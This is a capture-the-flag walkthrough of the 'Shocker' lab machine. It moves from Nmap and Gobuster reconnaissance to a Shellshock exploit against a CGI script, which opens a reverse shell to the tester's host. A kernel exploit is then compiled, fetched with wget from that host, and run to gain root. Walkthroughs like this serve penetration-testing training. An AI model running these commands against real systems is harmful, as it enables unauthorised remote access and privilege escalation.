The first step was to scan the machine with Nmap to find running services.
# Nmap 7.80 scan initiated Sun Oct 4 13:05:39 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.56 Nmap scan report for 10.10.10.56 Host is up (0.016s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%), Linux 4.9 (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Oct 4 13:06:11 2020 -- 1 IP address (1 host up) scanned in 32.42 seconds
We can see from the output that the host is running Apache 2.4.18 and OpenSSH on port 2222. I browsed to the site on Apache and was greeting with:
I then ran Gobuster against the machine to try and find hidden files.
root@kali:/home/kali/Documents/shocker# gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.56 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/06 14:02:31 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htaccess (Status: 403) /cgi-bin/ (Status: 403) /server-status (Status: 403) =============================================================== 2020/10/06 14:04:39 Finished ===============================================================
As you can see on the initial scan, nothing significant was found. It did however indicate the presence of a CGI-BIN directory. I decided to perform an additional scan against this directory using the same wordlist but looking for multiple file extension types, those which would generally be found in CGI-BIN.
root@kali:/home/kali/Documents/shocker# gobuster dir --url http://10.10.10.56/cgi-bin --wordlist /usr/share/wordlists/dirb/big.txt -x cgi,php,bat,html,htm,sh,asp,aspx,CGI,shtm,shtml =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.56/cgi-bin [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: aspx,shtm,shtml,bat,html,sh,asp,cgi,php,htm,CGI [+] Timeout: 10s =============================================================== 2020/10/05 15:15:55 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /.htaccess.bat (Status: 403) /.htpasswd.php (Status: 403) /.htaccess.html (Status: 403) /.htaccess.sh (Status: 403) /.htaccess.asp (Status: 403) /.htaccess.aspx (Status: 403) /.htaccess.shtm (Status: 403) /.htaccess.shtml (Status: 403) /.htaccess.cgi (Status: 403) /.htaccess.php (Status: 403) /.htaccess.htm (Status: 403) /.htaccess.CGI (Status: 403) /.htpasswd.htm (Status: 403) /.htpasswd.CGI (Status: 403) /.htpasswd.cgi (Status: 403) /.htpasswd.html (Status: 403) /.htpasswd.sh (Status: 403) /.htpasswd.asp (Status: 403) /.htpasswd.aspx (Status: 403) /.htpasswd.shtm (Status: 403) /.htpasswd.shtml (Status: 403) /.htpasswd.bat (Status: 403) /user.sh (Status: 200) =============================================================== 2020/10/05 15:25:31 Finished ===============================================================
You can see right at the bottom of this output that the file user.sh was discovered. This file contains the following:
Content-Type: text/plain Just an uptime test script 14:08:46 up 23:07, 0 users, load average: 0.00, 0.00, 0.00
There’s a big hint with the name of the machine being Shocker, that its very likely to be vulnerable to the shellshock vulnerability. After some Googling i discovered an exploit in this version of Apache. It is a remote command injection shellshock vulnerability which can be executed against CGI scripts. I downloaded the exploit and ran it against the Shocker machine specifying the user.sh file in the arguments:
root@kali:/home/kali/Documents/shocker# python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.38 lport=2600 pages=/cgi-bin/user.sh [!] Started reverse shell handler [-] Trying exploit on : /cgi-bin/user.sh [!] Successfully exploited [!] Incoming connection from 10.10.10.56 10.10.10.56> ls user.sh 10.10.10.56> cd / 10.10.10.56> ls bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv sys tmp usr var vmlinuz vmlinuz.old 10.10.10.56> cd home 10.10.10.56> ls shelly 10.10.10.56> cd shelly 10.10.10.56> ls user.txt 10.10.10.56> cat user.txt [REDACTED]
As you can see from the output above, this exploit executed successful and I was able to cat the user flag. I now needed to escalate privileges to capture the root flag. I checked the kernel version and found it was running 4.4.0-96-generic.
10.10.10.56> uname -a Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
A quick google search found there was a kernel exploit for this kernel. I downloaded this exploit and compiled it.
root@kali:/home/kali/Downloads# gcc 44298.c -o 44
I then hosted the binary on a python simple HTTP server and downloaded it on the Shocker machine with wget.
10.10.10.56> wget http://10.10.14.38:8000/44
--2020-10-06 13:57:42-- http://10.10.14.38:8000/44
10.10.10.56> ls -la
Connecting to 10.10.14.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: '44'
0K .......... ....... 100% 337K=0.05s
2020-10-06 13:57:42 (337 KB/s) - '44' saved [17880/17880]
The file was then made executable with chmod -x and executed.
10.10.10.56> chmod +x 44 10.10.10.56> ./44 10.10.10.56> whoami root
You can see from the output that it executed successfully, and I was now a root user on the machine. I finished by capturing the root flag.
10.10.10.56> cd /root 10.10.10.56> ls root.txt 10.10.10.56> cat root.txt [REDACTED]